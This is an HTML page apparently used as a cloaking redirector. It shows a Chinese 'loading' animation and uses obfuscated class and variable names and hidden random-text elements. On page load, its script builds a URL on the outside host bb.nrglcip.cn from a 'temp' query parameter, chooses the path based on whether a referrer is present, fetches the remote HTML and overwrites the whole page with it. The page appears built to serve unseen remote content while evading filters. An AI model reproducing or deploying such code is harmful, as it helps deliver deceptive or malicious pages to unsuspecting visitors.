<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BPb2NsbrN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BPb2NsbrN .MN5qMBVNEcx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BPb2NsbrN .content {
            line-height: 50px;
            text-align: center
        }

        .BPb2NsbrN .img {
            width: 100%
        }

        .BPb2NsbrN .QpZx3Df4Dbj {
            text-align: center
        }

        .BPb2NsbrN .QpZx3Df4Dbj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BPb2NsbrN .QpZx3Df4Dbj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BPb2NsbrN .QpZx3Df4Dbj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BPb2NsbrN .QpZx3Df4Dbj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BPb2NsbrN .QpZx3Df4Dbj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BPb2NsbrN .QpZx3Df4Dbj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BPb2NsbrN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dVCo9Ihwm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jM8FiZ = dVCo9Ihwm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jM8FiZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jM8FiZ +".html?a=share";
		}
		
        GAWJMjx=url+"#"+new Date().getTime();
        GAWJMjx && function() {
            $.get(GAWJMjx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >W4hWqiT0FSWQ4etFJ9GLxl6L7wYh1c9JZFyRIVHoG5Ys1f2C97NDaQzfh3Y2mqulrmdqM9bt5zYa1tMQRzfZicEizy4gTUYVzEy2e</h1>
<img  src='' style='display:none'>
<ul style='display:none' >I1a5xRMwYCc7SRqIXFn5rO</ul>
<b style='display:none' >YZisScQJAvuXWsWEr1raUyz8XP6pISy8N4IJun6F5O8PAXMgRcuSRF1</b>
<img  src='' style='display:none'><div class="BPb2NsbrN">
    <div class="MN5qMBVNEcx">
        <div class="QpZx3Df4Dbj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >swowtKTAE53e9UXeOMo3OyrFxqkAINqDzB5ShThkqrmPrPQFaHW0NNvXDBMJ24zxUo2hsW8nGb3kt5YbTkFufQ</ul>
<h1 style='display:none' >i66Hnrx6tc9vjAQ2cC5k1KV7KIy5j02YtVyPNAoVeYVber5jVDbVJIgByu7DRiOFLRIbh</h1>
<ul style='display:none' >swowtKTAE53e9UXeOMo3OyrFxqkAINqDzB5ShThkqrmPrPQFaHW0NNvXDBMJ24zxUo2hsW8nGb3kt5YbTkFufQ</ul>
<h1 style='display:none' >i66Hnrx6tc9vjAQ2cC5k1KV7KIy5j02YtVyPNAoVeYVber5jVDbVJIgByu7DRiOFLRIbh</h1>
<img  src='' style='display:none'>
<li style='display:none' >wbH8vTYdi4iSgHokNasJzWrRvno7JDB0WhlQ2Xe6cvAnxQq4OzI</li></body>
</html>